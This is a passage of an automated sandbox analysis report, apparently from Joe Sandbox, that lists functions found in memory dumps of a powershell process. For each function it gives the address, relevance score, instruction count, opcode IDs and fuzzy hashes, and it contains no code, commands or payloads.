                                  • Source File: 0000000B.00000002.2877330983.0000000008450000.00000040.00000800.00020000.00000000.sdmp, Offset: 08450000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_8450000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9b6dfb5767e262a9a6dba58e65b328b43b823adbb600b717510139bf79db1477
                                  • Instruction ID: 0f30cffb968b27aa416e8e4c468e1dc4382e39af2706163f5732da8b2722320c
                                  • Opcode Fuzzy Hash: 9b6dfb5767e262a9a6dba58e65b328b43b823adbb600b717510139bf79db1477
                                  • Instruction Fuzzy Hash: 91D11C35E01209DFDB05CFA8D884A9EBBB2FF88311F55815AE804AB356C771ED42CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07648490 Relevance: .3, Instructions: 275COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2871834426.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_7640000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: de23bf55f884947cb2e78c24b7bb9ee11079f50941af3bdde7af291287739ada
                                  • Instruction ID: 21a34af8192b7206749722f8046e3bc49b94005fe57797553c0b43de40683a30
                                  • Opcode Fuzzy Hash: de23bf55f884947cb2e78c24b7bb9ee11079f50941af3bdde7af291287739ada
                                  • Instruction Fuzzy Hash: 7CB17DB4B00206DBE714DB68C454FAEBBE2AFC8744F108069D506AF791DB72EC51CB95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0764A2EA Relevance: .3, Instructions: 271COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2871834426.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_7640000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9eff8547702266c3157e76dde502390bc44cce995f678f98c0318d391ed8102f
                                  • Instruction ID: 719c20d2121e2230af1fe86e5d14a58076b308af732942edaeb6b7a1b46f1022
                                  • Opcode Fuzzy Hash: 9eff8547702266c3157e76dde502390bc44cce995f678f98c0318d391ed8102f
                                  • Instruction Fuzzy Hash: 77B19BB4A40205EFEB14CFA4C550B9EBBB2AF88744F14C059E5066F395CB71EC46CB92
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 084518D5 Relevance: .3, Instructions: 260COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2877330983.0000000008450000.00000040.00000800.00020000.00000000.sdmp, Offset: 08450000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_8450000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 14fc79fc32030983621975eb09d61b1b3ebee085213d49bacf88b44701f5076b
                                  • Instruction ID: f2bb3cdded541fa2cc990135b3f310066b26d7f46445f0527954d71db9542683
                                  • Opcode Fuzzy Hash: 14fc79fc32030983621975eb09d61b1b3ebee085213d49bacf88b44701f5076b
                                  • Instruction Fuzzy Hash: C7A16B70E00209DFDB10CFA9C9817DEBBF5AF88315F14852AE815E7395EB749845CB81
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 076408D8 Relevance: .3, Instructions: 256COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2871834426.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_7640000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5fbc5a37f0ccfb70aaf6671b6949afecddb93e0ae6a8766c15cd090ca1fdf127
                                  • Instruction ID: a64d27476a4e8070e7bf1ddecb983c350608a5132bd8201c0a45b3505b722114
                                  • Opcode Fuzzy Hash: 5fbc5a37f0ccfb70aaf6671b6949afecddb93e0ae6a8766c15cd090ca1fdf127
                                  • Instruction Fuzzy Hash: 4E816876704365DFD7158B79C8107A7BBA5EFC2250F2880ABD646CB752CA32CC82C7A1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0764847E Relevance: .3, Instructions: 253COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2871834426.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_7640000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 258d92bc538bc7912763382bb1a2875a2bcdb2821e569733d5cd46af9a5dce56
                                  • Instruction ID: 50062a603337a0ed2b8da5ffc44f381cffc87d2b1613134c6bb70b458df228c0
                                  • Opcode Fuzzy Hash: 258d92bc538bc7912763382bb1a2875a2bcdb2821e569733d5cd46af9a5dce56
                                  • Instruction Fuzzy Hash: 2EA1BFB4B00202DFE714DB68C554F9EBBB2AF88744F108069E506AB791CB72EC51CF95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 08456258 Relevance: .2, Instructions: 234COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2877330983.0000000008450000.00000040.00000800.00020000.00000000.sdmp, Offset: 08450000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_8450000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 85d09e51dccb8f3aff65c31944c59cb378506fe159ec5bce5d31d0bc8cc230de
                                  • Instruction ID: 5d582ba96871d84c53669e73fcca6633c1889a03b40dad7892532e154e807c1a
                                  • Opcode Fuzzy Hash: 85d09e51dccb8f3aff65c31944c59cb378506fe159ec5bce5d31d0bc8cc230de
                                  • Instruction Fuzzy Hash: BF81DF30B00205CFDB15DFA8D890AAEBBB6FFC5210F558169E8059B396DB359C42CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0308AAC8 Relevance: .2, Instructions: 221COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2838665217.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_3080000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a49c530040d03c15d85524950e6830b0d92c27e2d8f7c22736b64dd507c21cb4
                                  • Instruction ID: 1197579481eba77236fe5edfdce14a5b4dd5eb4c2613a4e8c07e7559248b1acf
                                  • Opcode Fuzzy Hash: a49c530040d03c15d85524950e6830b0d92c27e2d8f7c22736b64dd507c21cb4
                                  • Instruction Fuzzy Hash: A5919F34A02204DFCB15EF68D484AAEBBF2FF89314F1885AAE4459B761CB35ED45CB50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03088DBE Relevance: .2, Instructions: 188COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2838665217.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_3080000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6f88b381816b57048aad8fbd6bd049149ddb66e68f1d9c36fbee4c31dcd31d20
                                  • Instruction ID: 93d52ad9d0d07f5d9863b3d7b362d501e9b16ef7f0f722d8843cb65b62112fea
                                  • Opcode Fuzzy Hash: 6f88b381816b57048aad8fbd6bd049149ddb66e68f1d9c36fbee4c31dcd31d20
                                  • Instruction Fuzzy Hash: BA716230E02608DFDF14EFA4D890AADBBF6BF88304F548569D442AB794DB749C46CB81
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 08455BF8 Relevance: .2, Instructions: 184COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2877330983.0000000008450000.00000040.00000800.00020000.00000000.sdmp, Offset: 08450000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_8450000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 21751faa2db207025c143fa863af6bdc5c99f2c37f1cc827cf809fb2517ee97a
                                  • Instruction ID: 571c74be32f531d7c923d9f9bf74c3096abade536796ab6ec283fc4c42112c62
                                  • Opcode Fuzzy Hash: 21751faa2db207025c143fa863af6bdc5c99f2c37f1cc827cf809fb2517ee97a
                                  • Instruction Fuzzy Hash: 08718030E10249CFDB15DFE4C9546AEBBB2BF85305F25852AD802AF39ADB749C49CB41
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07645F48 Relevance: .2, Instructions: 176COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2871834426.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_7640000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 957d118f328b60cce0b1900d88bdd29dd61e40d7df294ea5c82dbf334f6ddfd7
                                  • Instruction ID: 3f86053dc22f80aefc6896db37b80c98c91b9c8133bfaab8832038fcb2e6a569
                                  • Opcode Fuzzy Hash: 957d118f328b60cce0b1900d88bdd29dd61e40d7df294ea5c82dbf334f6ddfd7
                                  • Instruction Fuzzy Hash: 865127757083859FDB128B34C814BA6BFB1AFC3211F1881ABD5468B293DB35C852C7A3
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 030887A5 Relevance: .2, Instructions: 165COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2838665217.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_3080000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 18b19472bbc5c4d53329d11264b9ea4645951814483c623907da276b11bca210
                                  • Instruction ID: 6ebcfa74ef2ae0248400a1ab3cb348b7270330cede3eb43afad48db7fb93ea32
                                  • Opcode Fuzzy Hash: 18b19472bbc5c4d53329d11264b9ea4645951814483c623907da276b11bca210
                                  • Instruction Fuzzy Hash: F9614D34A01249CFDB05EFA4C544AADBBF2BF84300F659559E442AF365D778AD89CB40
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 030887BA Relevance: .2, Instructions: 164COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2838665217.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_3080000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bed4ed12950bb8e7ce6d7fca18b733be313f59f9b20dd4423b8aa0e763fcfe3d
                                  • Instruction ID: 6e4e1c1ca6a4879a7f17d357fabba3f5a9a58e29fe9184fc054fdc3b04bcd798
                                  • Opcode Fuzzy Hash: bed4ed12950bb8e7ce6d7fca18b733be313f59f9b20dd4423b8aa0e763fcfe3d
                                  • Instruction Fuzzy Hash: 57612F34A01649DFDB04DFA4C544A9DBBF2FF84300F659558E802AF369DB78AD89CB80
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03088C50 Relevance: .2, Instructions: 162COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2838665217.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_3080000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d3c9654f3d9113c22659fe631556e7a374a1ffe3fe4c8a4ffe229ae4be1d46a3
                                  • Instruction ID: 4419c22833afbeb5f87a061cc3f23a6c2ed7ba5f4fa967c3abdadd77476abefa
                                  • Opcode Fuzzy Hash: d3c9654f3d9113c22659fe631556e7a374a1ffe3fe4c8a4ffe229ae4be1d46a3
                                  • Instruction Fuzzy Hash: E3518E30A01608DFDB18EF69D880A9EBBF6FF89314F148469D046EB754DB71AC45CB80
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 030887C8 Relevance: .2, Instructions: 161COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2838665217.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_3080000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 48af2ad50a680ed85899ae88e9b94542a02424deda8a2b2bc0ef0e8d885378f4
                                  • Instruction ID: f168e584186f36106a312a6d15707add8daa91ef2561473b655771e78e80bd69
                                  • Opcode Fuzzy Hash: 48af2ad50a680ed85899ae88e9b94542a02424deda8a2b2bc0ef0e8d885378f4
                                  • Instruction Fuzzy Hash: DA612F34A01649CFDB04DFA4C544AADBBF2FF84300F659558E402AF369DB78AD89CB80
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 08456248 Relevance: .2, Instructions: 161COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2877330983.0000000008450000.00000040.00000800.00020000.00000000.sdmp, Offset: 08450000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_8450000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c5bc4bafb04260320dc42aa5546a06690845e2066bf9989c52ffc70f2507cc21
                                  • Instruction ID: 42e11b6a52e2c02b71efda8bbc50451a361329f0c6de4e40d77259e9c184c539
                                  • Opcode Fuzzy Hash: c5bc4bafb04260320dc42aa5546a06690845e2066bf9989c52ffc70f2507cc21
                                  • Instruction Fuzzy Hash: E851DF34B00205CBDB15EBB8D8506AEBBB7FFC4211F55816ED8019B396DB349C46CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 084566A8 Relevance: .2, Instructions: 152COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2877330983.0000000008450000.00000040.00000800.00020000.00000000.sdmp, Offset: 08450000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_8450000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4cf99ce61786b1cc0523406edd3ccaac60fa71ffc6607a0d327925c349718d11
                                  • Instruction ID: 1e9297e26fd48a77ab13dd55b89a30f3f70dda847dbba6d8500ab7a697492578
                                  • Opcode Fuzzy Hash: 4cf99ce61786b1cc0523406edd3ccaac60fa71ffc6607a0d327925c349718d11
                                  • Instruction Fuzzy Hash: F8517274A05255CFCB06CF6CC9909AEBBB1FF49310B25429AD951EB3A2C735EC45CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 08455BE8 Relevance: .1, Instructions: 137COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2877330983.0000000008450000.00000040.00000800.00020000.00000000.sdmp, Offset: 08450000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_8450000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6f7c3b78db2f6a37237f34f91753a5cbb3fa93a869620410cb6353884964101e
                                  • Instruction ID: 53a45c30b7f221cc99788ca9df277dcabbb6ffdc6362aadef3a4c37fce1b0eda
                                  • Opcode Fuzzy Hash: 6f7c3b78db2f6a37237f34f91753a5cbb3fa93a869620410cb6353884964101e
                                  • Instruction Fuzzy Hash: FE51BF71E11248CFDB15DFA8C8046AEBBB2BF85301F21856AD806AF359DB74AC49CB41
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07642C55 Relevance: .1, Instructions: 135COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2871834426.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_7640000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b101aac55b248d200a95ab7b4bf84defbaaa10a82dd5f6e9614adad81fc837c8
                                  • Instruction ID: 0b9a272517e0e152dae07859e8953f196a1947cb6e7ab9370e7c6969435c1ab6
                                  • Opcode Fuzzy Hash: b101aac55b248d200a95ab7b4bf84defbaaa10a82dd5f6e9614adad81fc837c8
                                  • Instruction Fuzzy Hash: 33418FF2B00211CFDB359778882179DBB92AFD1654B3480BAE5028F745DE61C852C7A6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 08456E2F Relevance: .1, Instructions: 129COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2877330983.0000000008450000.00000040.00000800.00020000.00000000.sdmp, Offset: 08450000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_8450000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b274e85c10c9fe1300b60b9ba40f0af4dea4366215a2f10f89c34f386b43d14c
                                  • Instruction ID: f3f106584345895e5877fff4a087f3514c1e74b1fb1cb3ec17e774f1a0bd5b61
                                  • Opcode Fuzzy Hash: b274e85c10c9fe1300b60b9ba40f0af4dea4366215a2f10f89c34f386b43d14c
                                  • Instruction Fuzzy Hash: 1D51EB35A00209DFDB05CFA8D484A9EBBB2FF88314F658159E804A7365CB75DD82CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 08456699 Relevance: .1, Instructions: 118COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2877330983.0000000008450000.00000040.00000800.00020000.00000000.sdmp, Offset: 08450000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_8450000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 35654a41f63865fca634c58cc9b2014c6c11fb346e35dad011ae2336d934d51e
                                  • Instruction ID: 44b3be7bf1589fefb18fe3351481de077eb70c0db4ad1f417206e6a6baac9723
                                  • Opcode Fuzzy Hash: 35654a41f63865fca634c58cc9b2014c6c11fb346e35dad011ae2336d934d51e
                                  • Instruction Fuzzy Hash: D6412D74A01505DFCB05CF9CC9849AEBBB1FF48310B258259E915AB3A5D335EC42CF50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0308B2E4 Relevance: .1, Instructions: 116COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2838665217.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_3080000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6fddeb59a3b3221b03ff37e67265d77ce30e8453ccb7366f313ed649d64fdc1c
                                  • Instruction ID: f6d35413b3e1bc7097991dee93fcd6274b4083d62b987bcc70aded6ba6aa999c
                                  • Opcode Fuzzy Hash: 6fddeb59a3b3221b03ff37e67265d77ce30e8453ccb7366f313ed649d64fdc1c
                                  • Instruction Fuzzy Hash: DB419F306022109FDB54EF64C459AAEBBFAEF89754F189468D447EB7A4DB349C01CB50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03088C42 Relevance: .1, Instructions: 115COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2838665217.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_3080000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: afb4105df5cc8166f00a8bd295ed4e9ab4d884b79ff127131eeb4ac99b8bf351
                                  • Instruction ID: 0732f2b4b499b8c59d3e9b5386af03dfe65f3914209f27606eb93a679caee294
                                  • Opcode Fuzzy Hash: afb4105df5cc8166f00a8bd295ed4e9ab4d884b79ff127131eeb4ac99b8bf351
                                  • Instruction Fuzzy Hash: 8641AF30A01708DFDB18EFA8C884A9EBBF6BF84304F54852DD446AB754DB70AC45CB80
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 08457050 Relevance: .1, Instructions: 110COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2877330983.0000000008450000.00000040.00000800.00020000.00000000.sdmp, Offset: 08450000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_8450000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2d59b9ce60f78ac614d244d7be4b6a9890e9426a6b4f6ea29fff6e3ca4e0a4fa
                                  • Instruction ID: 67b0ae1f3556aead6cfe726508357a8f30fb3d35c804890a03ded3b864739e3f
                                  • Opcode Fuzzy Hash: 2d59b9ce60f78ac614d244d7be4b6a9890e9426a6b4f6ea29fff6e3ca4e0a4fa
                                  • Instruction Fuzzy Hash: D9415E74A00205DFCB15CF99C9949AEFBB2FF88310B24866AD905AB365D731EC42CF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0764A72E Relevance: .1, Instructions: 102COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2871834426.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_7640000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fb468edc684efc8944591ded9018188212511235834aba1ebfde202b998cecfd
                                  • Instruction ID: 660b89c7389b5f0c4449943385801608f5fe905928ecc62f671810d22725608d
                                  • Opcode Fuzzy Hash: fb468edc684efc8944591ded9018188212511235834aba1ebfde202b998cecfd
                                  • Instruction Fuzzy Hash: D6316474B40214EBE7049BA4C854FAE76A3DFC5744F548024EA05AF791CFB59C528B91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03088DFF Relevance: .1, Instructions: 91COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2838665217.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_3080000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 80479f555bd8f8db981a18e4fa22694d5e144d44e870f8e18d8cc3a7b4541cff
                                  • Instruction ID: 7f2f3151a8859f2c691045cb30fd00ee7501cef057595f342f9505121b35466a
                                  • Opcode Fuzzy Hash: 80479f555bd8f8db981a18e4fa22694d5e144d44e870f8e18d8cc3a7b4541cff
                                  • Instruction Fuzzy Hash: 8C318F34E02218DFDB15EBA4C890AEDB7F7AFC8204F548569E441EB791DB30AD46CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03089300 Relevance: .1, Instructions: 86COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2838665217.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_3080000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1a0e1ffe6b9d688ee168dcc20167b8f5f6c76593cacde2461ac03cce2e998bcb
                                  • Instruction ID: 5f62d72000db4c32e55cdd78cdcd901b4dfb5691f004970b695688170d9f5111
                                  • Opcode Fuzzy Hash: 1a0e1ffe6b9d688ee168dcc20167b8f5f6c76593cacde2461ac03cce2e998bcb
                                  • Instruction Fuzzy Hash: B0318974A052569FCB04EB5CC5949AAFBF1FF89310B158096D948EB352C731EC82CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03088B18 Relevance: .1, Instructions: 82COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2838665217.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_3080000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2bdf70f4c81dfd327adeec5c27c950938963984efbbf86b92de171778248b63c
                                  • Instruction ID: 034e537d14f9206439195b37fbd8dce3d4fac08c2e7ee2fcd01418ca4da0fe77
                                  • Opcode Fuzzy Hash: 2bdf70f4c81dfd327adeec5c27c950938963984efbbf86b92de171778248b63c
                                  • Instruction Fuzzy Hash: 00318E747015059FDB04EF29D498AADBBFABF8C310F184068E506EB7A0DB74AC45CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0308C030 Relevance: .1, Instructions: 81COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2838665217.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_3080000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a3d98c13166dbb88be7933b8c95bf99a965d24ac1317da8f2d9d2f6b008db29d
                                  • Instruction ID: f9706dc57da243db9627c29411757078b0c9c8df04fd4357c5c1c9739cf9db99
                                  • Opcode Fuzzy Hash: a3d98c13166dbb88be7933b8c95bf99a965d24ac1317da8f2d9d2f6b008db29d
                                  • Instruction Fuzzy Hash: 44311775A002099FCB04DF5CC580AAAFBF6FF88310B258659D518AB755C731ED91CFA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03083A64 Relevance: .1, Instructions: 81COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2838665217.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_3080000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 44bf48748bd09405024223374d419d4f9a8e25dbadeecfbdd8ad4ee3f88b1718
                                  • Instruction ID: 37f553363dfea46b4cb2b3aaa78cbe2a6d48f9e33efa5c63d476c86f1559dafd
                                  • Opcode Fuzzy Hash: 44bf48748bd09405024223374d419d4f9a8e25dbadeecfbdd8ad4ee3f88b1718
                                  • Instruction Fuzzy Hash: A8214A2590E3E09FC7079B7C98B00D5BF709E4721471A50C7C1D4CF1A3D928885DCBAA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 084523D7 Relevance: .1, Instructions: 81COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2877330983.0000000008450000.00000040.00000800.00020000.00000000.sdmp, Offset: 08450000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_8450000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6cabb72ed5c516eafb3f38a05fd6a78478e661aedd227fb016e4181c39d94ba7
                                  • Instruction ID: 1305255d386850115aa4a0ee5ed4f720beeb912d55fa3e4b3ada1ac1ed7b07c6
                                  • Opcode Fuzzy Hash: 6cabb72ed5c516eafb3f38a05fd6a78478e661aedd227fb016e4181c39d94ba7
                                  • Instruction Fuzzy Hash: 1F310474A00619DFCB14CF5CC5849AEFBB1FF49310B25869AD959AB752C731EC82CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 08454838 Relevance: .1, Instructions: 80COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2877330983.0000000008450000.00000040.00000800.00020000.00000000.sdmp, Offset: 08450000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_8450000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 152c4f346a721850db0e1828128727a6d8ab6efd9b4b915c04a6be3063f60547
